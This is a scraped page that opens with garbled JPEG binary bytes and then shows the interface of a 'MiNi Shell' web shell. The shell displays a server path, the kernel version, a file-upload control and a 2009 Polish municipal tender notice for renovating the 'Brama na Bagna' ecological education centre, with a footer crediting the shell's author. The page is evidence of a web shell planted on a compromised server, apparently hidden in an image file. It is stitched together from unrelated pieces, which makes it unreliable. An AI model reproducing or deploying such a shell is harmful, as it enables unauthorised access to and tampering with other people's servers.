JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090905/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090905/306520-N-2009.html

<p class="kh_header"><b>Zawady: Remont Ośrodka Edukacji Ekologicznej Brama na Bagna w Strękowej Górze</b><br>
<b>Numer ogłoszenia: 306520 - 2009; data zamieszczenia: 05.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zawady , Plac Wolności 12, 16-075 Zawady, woj. podlaskie, tel. 085 7140116, faks 085 7140033.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont Ośrodka Edukacji Ekologicznej Brama na Bagna w Strękowej Górze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotowe zadanie obejmuje kompleksowy remont budynku i  kompleksową modernizację nieruchomości stanowiącej siedzibę OEE Brama na Bagna w tym:
-	Roboty remontowo-budowlane według kosztorysu inwestorskiego (piwnice + parter + piętro + przedsionek + taras + schody zewnętrzne + ocieplenie ścian i dachów + rynny + rury spustowe + winda dla niepełnosprawnych)
-	Instalacja grzejników łazienkowych
-	Instalacja kanalizacji, zimnej i ciepłej wody
-	Przebudowa instalacji centralnego ogrzewania
-	Instalacje elektryczne,
-	remont sali konferencyjno-szkoleniowej: zakup i montaż przesłony dźwiękoszczelnej oraz mebli,
-	roboty remontowo - budowlane poddasza (rozbiórka ścian wewnętrznych poddasza wraz ze stropem poddasza wraz z przebudową i wzmocnieniem więźby dachowej;
-	adaptacja poddasza na część hotelowo-biurową oraz mieszkanie służbowe,
-	wykonanie ekologicznej oczyszczalni ścieków,

Remontu sali konferencyjno-szkoleniowej, polegający na montażu przesłony dźwiękoszczelnej w pomieszczeniu, oraz wykonaniu dodatkowego wejścia na klatkę schodową, przystosowanego dla osób niepełnosprawnych tj. wydzielenie z jednej dużej sali (85,50 m2) dwóch mniejszych pomieszczeń o powierzchniach: 43,23m2 i 42,27m2. 
Każde z pomieszczeń zostanie wyposażone w następujące urządzenia i meble z materiałów przyjaznych środowisku (zakup):
.	drewnianych wieszaków na wierzchnią odzież (po 40 szt. wieszaków na jedną salę), montowanych na ścianie tak, by każdy mógł powiesić kurtkę w sali w której odbywają się warsztaty,
.	2 drewniane szafy typu zabudowa, 
.	drewnianych krzeseł z podkładką do pisania (po 40 szt. krzeseł na jedną salę), małych drewnianych stolików na metalowych nogach, przydatnych do pracy w grupach podczas warsztatów (20 szt.).
Zakup sprzętu do sali konferencyjnej
.	projektora multimedialnego - 2 szt.,
.	nagłośnienia i sprzętu multimedialnego (wzmacniacz, głośniki, sztuk, mikrofony, kable),
.	rzutnika do folii - 1 szt.,
.	komputera - 2 szt.

Zakup wyposażenia do pracowni - sprzętów wykonanych z materiałów przyjaznych środowisku:
.	duże prostokątne stoły wykonane z materiału drzewnego - 8 szt.,
.	szafa dwudrzwiowa- 2 szt., 
.	półki - 2 szt.
.	krzesła - 40 szt.,
.	ławki - 10 szt..
Wykonanie ekologicznej oczyszczalni ścieków 
.	budowę szczelnego osadnika gnilnego (wykonanie skarp ziemnych, ułożenie folii oraz wykonanie szczelnego przejścia rurami przez folię, ułożenie rur rozprowadzających),
.	wykonanie przepompowni oraz szuwarowo-trzcinowego filtra roślinnego
.	wykopanie stawu doczyszczającego, z którego oczyszczone ścieki trafią do gruntu.
Roboty remontowo-budowlane (poddasze)
Działanie dotyczy remontu poddasza, polegającego na:
.	rozbiórce ścian wewnętrznych poddasza wraz ze stropem poddasza (wykonanych niezgodnie ze sztuką budowlaną i mających niekorzystny wpływ na inne elementy konstrukcyjne budynku) oraz z przebudową i wzmocnieniem konstrukcji dachowej,
.	wykonaniu ścian działowych z suchego tynku, tworzących nowy układ funkcjonalny kondygnacji, tj.:
o	mieszkanie służbowe o pow. użytkowej 67,50 m2,
o	pomieszczenie biurowe z łazienką,
o	3 pokoje 2-, 3- osobowe z łazienkami,
o	2- pokojowy apartament dla 4 osób,
o	pomieszczenie gospodarcze, magazyn na czystą pościel;
.	powiększenie otworów okiennych w części mieszkalnej i pokojach gościnnych wraz z wykonaniem nowych nadproży,
.	zamurowanie otworów okiennych w ścianach szczytowych,
.	wykonanie nowej wentylacji grawitacyjnej,
.	wykonanie nowych posadzek (wykładzina dywanowa, tarkett, gres),
.	ułożenie glazury do wysokości 2.00 m w łazienkach,
.	wymurowanie ścianki działowej o grubości 12 cm wydzielających klatkę schodową jako strefę pożarową,
.	oczyszczenie i uzupełnienie istniejącej balustrady, oraz pomalowanie i wykonanie nowych poręczy.
Zakupu i montaż infrastruktury technicznej oraz materiałów edukacyjnych na potrzeby Ośrodka Edukacji Ekologicznej.
W ramach projektu planowany jest: 
o	zakup sprzętu do sali konferencyjnej (komplet: 2 projektory, nagłośnienie, kable, 2 komputery),
o	zakup wyposażenia pracowni (komplet: zestaw do produkcji papieru czerpanego),
o	zakup pieca elektrycznego do wypieku wyrobów z gliny wraz z montażem,
o	zakup pomocy dydaktycznych - lornetki,
o	zakup pomocy dydaktycznych - aparat fotograficzny wraz z osprzętem,
o	zakup pomocy dydaktycznych - książki,
o	zakup pomocy dydaktycznych - odtwarzacze muzyki,
o	zakup pomocy dydaktycznych - kalosze,
o	zakup pomocy dydaktycznych - lunety 4 sztuk wraz z osprzętem,
o	zakup ksero,
o	opracowanie tablic edukacyjnych, 
o	wykonanie tablic edukacyjnych na ścieżkach i w ogrodzie,
o	wykonanie tablic przy instalacjach pokazowych,
o	zakup wystawy ptaków z drewna wraz z gablotami,
o	zakup gablot i półek do izby regionalnej,
o	wykonanie ogrodu ekologicznego,
o	zakup zewnętrznych i wewnętrznych pojemników na odpady (różne wielkości i rodzaje razem 15 pojemników) oraz budowa zadaszenia i kompostownika,
wykonanie małej architektury terenowej wokół ośrodka (miejsce na ognisko, wiata na opał,
Zakup pomocy dydaktycznych
.	lornetka o parametrach  8 x 40 firmy Delta Optical - 40 szt.,
.	aparat  fotograficzny wraz z osprzętem - 1 szt.,
.	książki - 1 komplet,
.	odtwarzacz muzyki - 2 szt.,
.	kalosze - 80 par,
.	lunety wraz z osprzętem - 4 szt.,
.	wystawa ptaków z drewna wraz z gablotami - 1 komplet,
.	tablice edukacyjne na ścieżkach i w ogrodzie - 4 szt..
Zakup niezbędnego wyposażenia Ośrodka
	kserokopiarki - 1 szt.,
.	gablot i półek do izby regionalnej - 1 komplet,
.	zewnętrznych i wewnętrznych pojemników na odpady - 15 szt., oraz budowę zadaszenie i kompostownika.
Zagospodarowanie przestrzeni wokół Ośrodka
.	miejsce na ognisko, wyposażone w 4 ławy wolno stojące oraz 4 ławy wolnostojące z oparciem,
.	wiata na opał,
.	plac zabaw, 
.	ścianka wspinaczkowa,
.	ogród ekologiczny..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.27.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> wymagane wadium w wys. 25000<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
	a/ posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
	b/posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia
	c/znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
	d/nie podlegają wykluczeniu (z mocy ustawy) z postępowania o udzielenie zamówienia 
2)	warunki szczegółowe wymagane od wykonawców:
a/ udokumentowanie, że wykonawca posiada na koncie kwotę nie mniejszą niż zaoferowana cena (np. wyciąg z rachunku bankowego) lub wykonawca będzie miał udzielony kredyt w takiej wysokości. Informacja wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
b/ potwierdzenie, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej (§ 1 ust. 3 pkt 3 rozporządzenia).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Warunki zostaną uznane za spełnione, na podstawie dokumentów, o których mowa w punkcie 8 druku oferty stanowiącej dodatek do niniejszej specyfikacji.	Brak któregokolwiek z tych dokumentów spowoduje odrzucenie oferty.
Ocena będzie dokonywana na zasadzie spełnia lub nie dotyczy albo nie spełnia ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.ug.zawadywrotapodlasia.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Zawady
Plac Wolności 12
16-075 Zawady.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2009 godzina 10:00, miejsce: Urząd Gminy Zawady
Plac Wolności 12
16-075 Zawady
Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com